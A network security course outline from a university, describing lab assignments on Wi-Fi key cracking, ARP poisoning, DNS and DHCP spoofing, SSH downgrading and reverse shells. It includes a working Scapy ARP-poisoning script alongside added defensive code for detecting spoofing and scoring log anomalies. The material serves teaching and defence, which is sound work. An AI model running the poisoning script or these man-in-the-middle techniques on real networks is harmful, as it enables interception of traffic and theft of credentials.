UNIVERSITY OF JYVÄSKYLÄ
TIES327 – Network Security (3-5 ECTS)
Prof. Timo Hämäläinen [email protected]
Department of Mathematical Information Technology
IT Faculty
University of Jyväskylä
Important note!
If you completed the "old course" TIES326 in 2012 or 2013, you will not get credits from TIES327, as more than 50% of its assignments are the same as those of TIES326 in 2012 and 2013.
Students who completed TIES326 before 2012 may get credits from TIES327.
Goals of the course
Students understand what the term "security" means, in particular from the point of view of networks and services
... get familiar with the different security aspects and understand the necessary terms
... are capable of applying the various tools for auditing networks and protecting against network attacks
... learn to look for new knowledge in this area
A feeling of safety must not be based on ignorance!
The course focuses on hands-on work with security issues and learning by doing different network security exercises
Remember: use of the presented methods is illegal in public networks!!
Prerequisites
• Basic knowledge of networks, TCP/IP protocols and programming
• For example the following courses (or similar knowledge):
• ITKP101 - Tietokone ja tietoverkot työvälineenä
• ITKP104 - Tietoverkot
• ITKP102 - Ohjelmointi 1
How to complete the course?
• Complete the assignments
• In groups of 1-3 students
• You must get at least 50% of the total points and at least 50% of the points of each assignment.
• 3 ECTS: complete assignments 1-9
• 4 ECTS: complete assignments 1-11
• 5 ECTS: complete all 13 assignments
• Different network attack configurations, and tools for protecting and analysing networks
• MITM, WLAN cracking, VPN, firewall, IDS etc.
• pfSense: http://www.pfsense.org/
• Snort: http://www.snort.org/
• Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa
• Wireshark: http://www.wireshark.org/
• Scapy: http://secdev.org/projects/scapy/
• Kali Linux: http://www.kali.org/
• Exam (not obligatory; for upgrading the grade, max. 15 points)
About the assignments
1. Virtual network configuration
• In this first assignment, you will create and configure a virtual network which will be used for testing different kinds of network attacks.
• To do this you need a PC with 2 Gb of RAM (more is of course better!).
• We have used Ubuntu, but it is of course possible to make the same virtual network configuration on Windows or Mac OS by using the corresponding commands.
• https://www.virtualbox.org/
2. Security in social media / student presentations (lecture 3)
Groups of 1-4 students will make a presentation. The topic is security in social media (duration of the presentation 20-25 min).
The presentation should cover the following aspects. Even better if you can create your own live demo, like e.g. http://www.youtube.com/watch?v=-H1qjiwQldw:
1. What kinds of threats/attacks exist in social media?
• Social engineering, phishing, spam, code injection, XSS, CSRF/XSRF, DDoS etc.
2. How can you protect against these threats?
3. Possibilities and drawbacks of Web technologies
• Asynchronous JavaScript And XML (AJAX), Cascading Style Sheets (CSS), Flash, JSON and XML etc.
All groups will return a www link (no attachment!) to their presentation by 9.11 at 23:59 to: [email protected].
At the beginning of the lecture we will randomly select four groups to give their presentations.
About the assignments
3. WEP Cracking
• In this assignment you are going to crack a WEP key with the tools available at http://aircrack-ng.org/
• It is intended to build your basic skills and get you familiar with wireless network security concepts.
• It assumes you have a working wireless card with drivers already patched for injection.
• The basic concept behind this work is using aireplay-ng, which replays an ARP packet to generate new unique IVs.
• In turn, aircrack-ng uses the new unique IVs to crack the WEP key.
• It is important to understand what an ARP packet is (http://tools.ietf.org/html/rfc826).
4. WPA Cracking
• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys.
• We recommend you do some background reading to better understand what WPA/WPA2 is.
• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys.
• So make sure airodump-ng shows the network as having the authentication type PSK; otherwise, don't bother trying to crack it.
• There is another important difference between cracking WPA/WPA2 and WEP: the approach used to crack the WPA/WPA2 pre-shared key.
• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2.
• This is because the key is not static, so collecting IVs, as when cracking WEP encryption, does not speed up the attack.
• The only thing that gives the information needed to start an attack is the handshake between client and AP.
• Handshaking is done when the client connects to the network.
• Although not absolutely true, for the purposes of this assignment, consider it true.
• Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
• The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length.
5. ARP Poisoning
• In this assignment you are going to perform two Man-In-The-Middle (MITM) attacks: poisoning ARP tables and redirecting ICMP traffic.
• ARP poisoning is also known as ARP spoofing, ARP flooding and ARP poison routing.
• So what basically is ARP poisoning?
• It is a technique which allows an attacker to sniff traffic on a LAN, monitor it and even stop it.
• ARP poisoning is done by sending fake or spoofed ARP messages to an Ethernet LAN card.
• By doing so the attacker manages to associate its MAC address with the IP address of another node on the network (which is basically the default gateway IP).
• Then the traffic meant for the gateway first goes to the attacker and then to the gateway, thus allowing the attacker to sniff traffic from the network.
5. ICMP Redirection
• ICMP (Internet Control Message Protocol) is used to send error messages, report problems and for routing purposes.
• When the router sends the client a route redirection indicating a shorter route to some particular destination, a host-route entry is added to the client's routing table.
• The attacker can change the client's routing table so that traffic from the client to a web server will be redirected to the attacker.
• For this purpose the attacker sends an ICMP redirect message to the client, in which the source IP is the gateway, the source IP for redirection is the client, the destination IP for redirection is the web server and the gateway is the attacker.
• After the client updates its routing table with the web server's IP address and the attacker's IP address, all traffic from the client to the web server is redirected to the attacker.
6. DNS spoofing
• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS and DHCP servers.
• The Domain Name System translates names that humans can understand into IP addresses.
• First, the client sends a DNS query and the DNS server responds with a DNS response.
• The DNS query and response have an identical ID number and query.
• Then the client updates its DNS cache entries with the corresponding domain name and IP address.
• Assume that the attacker wants to change the client's DNS cache so that traffic from the client to the domain web.seclab.jyu.fi will be redirected to the attacker's server 192.168.1.102.
• For this purpose the attacker sniffs DNS queries from the client and waits for a DNS query with the relevant query; then the attacker spoofs a DNS response, e.g. with the attacker's IP.
• The client updates its DNS cache and therefore all traffic goes to the attacker. The attacker keeps spoofing DNS responses to keep the forged entry in the cache.
• However, the DNS query eventually arrives at the DNS server and the server will respond with a legitimate DNS response.
• When the client gets the legitimate response, it will update its cache.
• For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section, we show how to spoof the DNS server.
6. DHCP spoofing
• DHCP (Dynamic Host Configuration Protocol) is used to configure network settings on hosts in IP networks.
• DHCP allows hosts to be dynamically configured with an IP address, subnet mask, gateway address and DNS server address.
• It works as follows: first, the client sends (broadcasts) a DHCP discover containing a transaction ID.
• The DHCP server responds with a DHCP offer which contains the same transaction ID.
• The client then sends a DHCP request and the DHCP server responds with a DHCP ack.
• When applying a DHCP spoofing attack, the attacker waits for a DHCP discover request from the client.
6. DHCP spoofing
• After getting this request the attacker spoofs a DHCP offer assigning a malicious gateway and/or DNS server.
• After that the client responds with a DHCP request and the attacker spoofs a DHCP ack as well.
• Finally, the client updates its DNS server and gateway addresses.
• However, when the DHCP discover arrives at the DHCP server, the server responds to the client with a legitimate DHCP offer.
• If the client gets the legitimate offer first, DHCP spoofing will not work.
• For this reason, the attacker DoSes the DHCP server during the attack so that the DHCP server cannot respond to clients.
• In this section, we show how to spoof the DHCP server.
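A passive detector for the on-wire symptoms of the three attacks described in assignments 5 and 6 (a second MAC claiming the gateway IP, two different answers for one DNS transaction ID and name, a DHCP offer from a server that is not on the authorised list). This is an added example, not course code; the packet fields are constructed records standing in for what a sniffer such as Scapy would extract, and the gateway MAC, the attacker MAC and the example.test name are assumed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpReply:
    """ARP reply as seen on the wire: 'sender_ip is at sender_mac'."""
    sender_ip: str
    sender_mac: str

@dataclass(frozen=True)
class DnsResponse:
    """DNS answer, matched to its query by transaction id and queried name."""
    txid: int
    qname: str
    answer_ip: str

@dataclass(frozen=True)
class DhcpOffer:
    """DHCP offer: the server that sent it and the settings it hands out."""
    server_ip: str
    gateway: str
    dns_server: str

class SpoofDetector:
    """Flags ARP poisoning, DNS spoofing and rogue DHCP offers from passive observation."""

    def __init__(self, gateway_ip, gateway_mac, dhcp_servers):
        self.arp_table = {gateway_ip: gateway_mac}  # known-good IP -> MAC binding (assumed)
        self.dhcp_servers = set(dhcp_servers)       # authorised DHCP servers
        self.dns_seen = {}                          # (txid, qname) -> first answer seen
        self.alerts = []

    def on_arp(self, r):
        # A second MAC claiming an IP already in the table is the poisoning signature.
        known = self.arp_table.setdefault(r.sender_ip, r.sender_mac)
        if known != r.sender_mac:
            self.alerts.append(f"ARP: {r.sender_ip} claimed by {r.sender_mac}, table has {known}")

    def on_dns(self, r):
        # The spoofed answer arrives first; the real server's answer for the
        # same id and name arrives later and disagrees with it.
        first = self.dns_seen.setdefault((r.txid, r.qname), r.answer_ip)
        if first != r.answer_ip:
            self.alerts.append(f"DNS: id {r.txid:#06x} {r.qname} answered {first} then {r.answer_ip}")

    def on_dhcp(self, o):
        # Any offer not from an authorised server is a rogue DHCP server.
        if o.server_ip not in self.dhcp_servers:
            self.alerts.append(f"DHCP: rogue offer from {o.server_ip} (gw {o.gateway}, dns {o.dns_server})")

    def feed(self, event):
        handler = {ArpReply: self.on_arp, DnsResponse: self.on_dns, DhcpOffer: self.on_dhcp}
        handler[type(event)](event)

def run_sample():
    """Constructed traffic: gateway 192.168.1.1, attacker host 192.168.1.102 (from the slides)."""
    det = SpoofDetector("192.168.1.1", "00:11:22:33:44:01", ["192.168.1.1"])
    events = [
        ArpReply("192.168.1.1", "00:11:22:33:44:01"),                 # genuine gateway reply
        ArpReply("192.168.1.1", "00:11:22:33:44:ff"),                 # attacker claims gateway IP
        DnsResponse(0x1a2b, "web.seclab.jyu.fi", "192.168.1.102"),     # spoofed answer, arrives first
        DnsResponse(0x1a2b, "web.seclab.jyu.fi", "10.0.0.5"),          # legitimate answer (assumed IP)
        DnsResponse(0x1a2c, "example.test", "10.0.0.7"),               # single, consistent answer
        DhcpOffer("192.168.1.1", "192.168.1.1", "10.0.0.5"),           # authorised server
        DhcpOffer("192.168.1.102", "192.168.1.102", "192.168.1.102"),  # rogue server
    ]
    for ev in events:
        det.feed(ev)
    return det.alerts
```

Running run_sample() returns exactly three alerts, one per attack; the genuine gateway reply, the consistent DNS answer and the authorised offer stay silent.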
7. Annoying HTTP server and bank attack
• This assignment deals with two Man-In-The-Middle (MITM) attacks: an annoying HTTP server and a bank attack.
• Once an attacker is located in the middle between his victim and other network nodes, he can easily change HTTP requests and responses which go through him.
• In this section, the attacker changes the web pages which the victim requested from a web site to make the victim feel nervous.
• For this attack, the attacker first poisons the ARP cache of the victim in order to be "in the middle".
• Then, when the victim requests a web page, he modifies all pictures contained on the page and sends the result to the victim.
Bank attack
• In this section, we use the case where the attacker places himself "in the middle" and then steals money from the victim's bank account when the victim logs in to the system.
• Despite the fact that the cryptographic protocol SSL is used by the bank web site, the attacker is still able to transfer the victim's money to another bank account.
8. SSH downgrading
• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote shell services or command execution and other secure network services between two networked computers that it connects via a secure channel over an insecure network.
• The protocol specification distinguishes two major versions that are referred to as SSH-1 and SSH-2.
• Here we consider the most famous example of a downgrade attack, where the attacker forces the client and the server to use the insecure SSH-1 protocol.
• The client sends a request to establish an SSH link to the server and asks it for the version it supports. The server answers either with:
- ssh-2.xx, i.e. the server supports only SSH-2,
- ssh-1.99, i.e. the server supports SSH-1 and SSH-2,
- ssh-1.51, i.e. the server supports only SSH-1.
• In our example, the server is configured to support both SSH-1 and SSH-2, and the client is set to use SSH-2 and SSH-1 with SSH-2 as the preference.
• In this case the hacker, if he is already located in the middle (e.g. after applying ARP poisoning), will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the server supports only SSH-1, and thus forces the client to open an SSH-1 link.
• The client, who thinks it is using the secure SSH-2 protocol, will log in with SSH-1 and the password will be immediately captured by the hacker because of the weak SSH-1 password authentication mechanism.
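A client-side check of the server's identification string, added here as an example (not course code): it parses the banner as defined in RFC 4253 section 4.2 and applies the client policy that decides whether the "1.99" to "1.51" edit described above succeeds. The banner is sent before any key exchange, so nothing protects its integrity; refusing SSH-1 outright (allow_ssh1=False, the equivalent of OpenSSH's client setting Protocol 2) is what stops the downgrade. The version strings are the ones quoted on the slide; the software names are assumed.

```python
import re

# SSH-protoversion-softwareversion [SP comments] CR LF  (RFC 4253, 4.2)
BANNER_RE = re.compile(
    r"^SSH-(?P<proto>\d+\.\d+)-(?P<soft>\S+)(?: (?P<comment>.*))?\r?\n?$"
)


def parse_banner(line):
    """Return (protoversion, softwareversion) or None for a malformed banner."""
    m = BANNER_RE.match(line)
    return (m.group("proto"), m.group("soft")) if m else None


def server_supports(protoversion):
    """Map the announced protoversion to the set of major versions offered."""
    if protoversion == "1.99":
        return {1, 2}          # server speaks both; the client chooses
    if protoversion.startswith("2."):
        return {2}
    if protoversion.startswith("1."):
        return {1}             # e.g. the "1.51" string the attacker substitutes
    return set()


def choose_version(banner, allow_ssh1=False):
    """Pick the major version the client will use, or None to abort the connection.

    With allow_ssh1=False a tampered "1.51" banner is rejected instead of being
    followed into SSH-1; with allow_ssh1=True the downgrade on the slide works.
    """
    parsed = parse_banner(banner)
    if parsed is None:
        return None
    offered = server_supports(parsed[0])
    if 2 in offered:
        return 2               # always prefer SSH-2 when it is on offer
    if 1 in offered and allow_ssh1:
        return 1
    return None


if __name__ == "__main__":
    for banner in ("SSH-1.99-OpenSSH_5.9\r\n", "SSH-1.51-OpenSSH_5.9\r\n"):
        print(repr(banner.strip()), "->", choose_version(banner), choose_version(banner, True))
```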
9. Reverse TCP attack
• Man-In-The-Middle attacks can be combined with such dangerous attacks as a reverse TCP connection.
• A firewall usually blocks open ports, but does not block outgoing traffic; therefore a reverse connection is used to bypass firewall and router security restrictions.
• For example, a Trojan horse running on a computer behind a firewall that blocks incoming connections can easily open an outbound connection to a remote host on the Internet.
• Once the connection is established, the remote host can send commands to the Trojan horse.
• Trojan horses that use a reverse connection usually send SYN (TCP) packets to the attacker's IP address.
• The attacker listens for these SYN packets and accepts the desired connections.
10. Configuring a VPN connection with the help of OpenVPN
• In this assignment you configure an OpenVPN server and client, set up your own Certificate Authority (CA), generate keys and sign certificates.
• In addition, it describes dual-factor authentication based on a username and password, which are used by the server for authenticating a connecting client.
• OpenVPN is a full-featured SSL VPN which implements secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or username/password credentials, and allows user- or group-specific access control policies using firewall rules applied to the VPN virtual interface.
11. Public-key cryptography with GNU Privacy Guard
• Public-key cryptography allows you to communicate with someone securely without exchanging a secret password first. With public-key encryption, instead of sharing a password, each party generates a "keypair" consisting of a "public" key and a "secret/private" key.
• Each party can then publish their "public" key to the world or send it directly to the other party, while keeping their secret key private and safe. If you have a person's public key, you can do a few things with it:
• Encrypt a message that only that person can decrypt (they need their secret key to decrypt it).
• Validate that the person signed a message with their secret key. This also lets you verify strongly that the message was not corrupted or modified in transmission.
• With your secret key, you can do the following things:
• Decrypt messages encrypted with your public key.
• Sign messages that others can verify came from you (they need your public key to verify the signature).
• This assignment explains how to configure and use a Public Key Infrastructure (PKI), encrypt files and sign emails by using GNU Privacy Guard (GPG).
• GNU Privacy Guard is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC 4880. GPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.
12. Configuration of Snort and pfSense
• In this assignment you are going to install, configure and tune Snort and pfSense for protecting your network.
• Snort is a free and open source network intrusion prevention system and network intrusion detection system (signature based).
• pfSense is an open source firewall/router software distribution based on FreeBSD.
13. Network traffic anomaly detection
• In this assignment, an HTTP access log file is preprocessed into a numerical matrix, anomalous queries are found using dimensionality reduction and clustering, and finally the anomalous log lines are analyzed.
• In this exercise, it is assumed that some kind of Linux distribution is used (running in VirtualBox etc. is fine).
• Windows installation might be possible, but it is much easier on Linux.
• In the following examples, the Octave software is used.
• In addition, we need the package octave-statistics.
• If available, Matlab uses the same syntax.
• Python is also used, because the character distribution file will be generated with it from the Apache log file.
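The preprocessing step of assignment 13 in Python, added here as an example and not the course's own script: each request path from an Apache access log becomes one row of character frequencies, and each row is then scored by its distance from the centroid of all rows. The log lines are constructed, and the distance-to-centroid score is a simplified stand-in for the dimensionality reduction and clustering the assignment performs in Octave on the same matrix.

```python
import math
import re
import string

# Feature alphabet: lower-case letters, digits and punctuation (one column each).
ALPHABET = string.ascii_lowercase + string.digits + string.punctuation

# Apache Common Log Format: host ident user [time] "method path protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) \S+')

# Constructed sample log: four ordinary page requests and one request (line 4)
# whose query string is packed with percent-encoded punctuation.
SAMPLE_LOG = """\
192.168.1.10 - - [10/Oct/2013:13:55:36 +0300] "GET /index.html HTTP/1.1" 200 2326
192.168.1.11 - - [10/Oct/2013:13:55:40 +0300] "GET /about.html HTTP/1.1" 200 1504
192.168.1.10 - - [10/Oct/2013:13:56:02 +0300] "GET /news/2014.html HTTP/1.1" 200 8810
192.168.1.12 - - [10/Oct/2013:13:56:15 +0300] "GET /login.php?user=%27%29%3B%2D%2D%20%3C%3E%21%40%23 HTTP/1.1" 500 312
192.168.1.13 - - [10/Oct/2013:13:56:30 +0300] "GET /contact.html HTTP/1.1" 200 1102
"""


def request_path(line):
    """Return the requested path (with query string) or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.group(3) if m else None


def char_distribution(text):
    """Relative frequency of each ALPHABET symbol in text: one row of the matrix."""
    text = text.lower()
    counts = [0] * len(ALPHABET)
    for ch in text:
        idx = ALPHABET.find(ch)
        if idx >= 0:
            counts[idx] += 1
    total = len(text)
    return [c / total for c in counts] if total else [0.0] * len(ALPHABET)


def feature_matrix(log_text):
    """Preprocess the log into (paths, rows): one distribution row per parsed request."""
    paths = [p for p in map(request_path, log_text.splitlines()) if p]
    return paths, [char_distribution(p) for p in paths]


def rank_anomalies(log_text):
    """Score each request by Euclidean distance from the centroid of all rows.

    Returns (score, path) pairs, most anomalous first; a request whose character
    mix differs from the bulk of the traffic lands at the top of the list.
    """
    paths, rows = feature_matrix(log_text)
    n = len(rows)
    centroid = [sum(row[j] for row in rows) / n for j in range(len(ALPHABET))]
    scored = [(math.dist(row, centroid), path) for row, path in zip(rows, paths)]
    return sorted(scored, reverse=True)


if __name__ == "__main__":
    for score, path in rank_anomalies(SAMPLE_LOG):
        print(f"{score:.3f}  {path}")
```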
Tools used in assignments
Kali Linux http://www.kali.org/
From the creators of BackTrack comes Kali Linux, the most
advanced and versatile penetration testing distribution ever created.
BackTrack has grown far beyond its humble roots as a live CD and
has now become a full-fledged operating system
Some tools used in assignments
Python https://www.python.org/
Scapy http://secdev.org/projects/scapy/
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.
It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).
It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining techniques (VLAN hopping + ARP cache poisoning, VoIP decoding on a WEP encrypted channel, ...), etc.
Tools used in assignments
Python scripts
ARP poisoning
ICMP Redirection
DNS spoofing
DHCP spoofing
Annoying HTTP server
Bank attack
SSH downgrading
Other files
Login database for the bank server
Certificate file for the bank server
Bank server
Keylogger for the Ubuntu reverse TCP attack
Keylog reader for the Ubuntu reverse TCP attack
An example: ARP poisoning (Python)

from scapy.all import *
from time import sleep
import threading
import os, sys


class SpoofThread(threading.Thread):
    """One thread per victim: keeps re-sending the same forged ARP packet."""

    def __init__(self, victim, gateway):
        # Forged ARP packet whose sender IP is the gateway's; the hardware
        # source defaults to this host's MAC, so the victim's ARP cache ends
        # up mapping the gateway IP to the attacker's MAC.
        self.packet = ARP()
        self.packet.psrc = gateway
        self.packet.pdst = victim
        threading.Thread.__init__(self)

    def run(self):
        counter = 0
        print("spoofing " + str(self.packet.pdst) + " every 5 seconds...")
        try:
            while 1:
                # Re-send every 5 seconds so the poisoned entry does not expire.
                send(self.packet, verbose=0)
                counter += 1
                print('poison #' + str(counter))
                sleep(5)
        except Exception as e:
            print(type(e))
            print(e.args)
            print(e)


if __name__ == '__main__':
    if len(sys.argv) != 3:
        sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n'
                 'example: python ArpSpoofing.py 192.168.72.128 192.168.72.2'
                 % os.path.basename(__file__))
    targets_dest_ips = [sys.argv[1]]
    spoofed_src_ip = sys.argv[2]
    for ip in targets_dest_ips:
        SpoofThread(ip, spoofed_src_ip).start()
Course grading
Total points   Grade
55             5
50             4
45             3
40             2
30             1
Work load
Ca. 150 hours, consisting of lectures ca. 20 hours and assignments x hours, of course depending on your background skills.
About the lectures
The lectures are intended to provide an introduction to various network security topics and examples.
The course focuses on hands-on work with security issues and learning by doing (not learning by listening!).
Some literature:
• Lots of research papers
- IEEE Xplore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp
- ACM, http://portal.acm.org/dl.cfm
- Google Scholar, http://scholar.google.com/
- http://site.ebrary.com/lib/jyvaskyla
• Introduction to Network Security
• Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions
• CEH: Certified Ethical Hacker Study Guide
L1: Introduction to network security
What is security and what are the goals
Threats to networks and IT systems
Security policies
Risk calculation
Security offenses
Social Engineering
Phishing
Legislation
L2: Recent networking security threats/malwares
(visiting lecture by Matti Kannela)
Trojan horses
Rootkits
Spyware
Worms
Viruses
Adware
Backdoors
Ransomware
Etc.
L3: Security in social media (student presentations)
Assignment no. 2 (see the assignment description above)
L4: Security for 4G Cellular Networks
(visiting lecture by Zheng Chang)
Cellular network security issues (PHY/MAC layers)
SECURITY THREATS
User identity
Femtocells
Interoperability
RRC signalling
Other threats
Being an all-IP network makes the system vulnerable to IP attacks, such as Denial of Service (DoS) over the public IP addresses of the core network interfaces, traffic eavesdropping and injection attacks.
L5: Modelling attacks (visiting lecture by
Simo Huopio, Finnish defence forces)
Modelling and analysing attacks against network and
services
DDoS (Distributed Denial of Service)
Zero-Day attacks
APT (Advanced Persistent Threat)
Fuzzing / testing programs for vulnerabilities
L6: Protecting your networked services (visiting lecture
by Tapio Väärämäki, Exclusive Networks Finland)
CARM – Cyber Attack Remediation and Mitigation
UTM (Unified Threat Management)
NGFW (Next Generation Firewall)
WAF (Web Application Firewall)
Database Security
File Security
Endpoint Security
L7: Monitoring and analysing the network data
Normal network behaviour
Anomaly detection
How to gather data
Pre-processing and analysing the data
Some links
http://www.cert.fi/
http://www.vm.fi/tietoturvallisuus
http://www.digitoday.fi/tietoturva
http://www.securityfocus.com
http://www.secureworks.com/cyber-threat-intelligence/advanced-threat-services/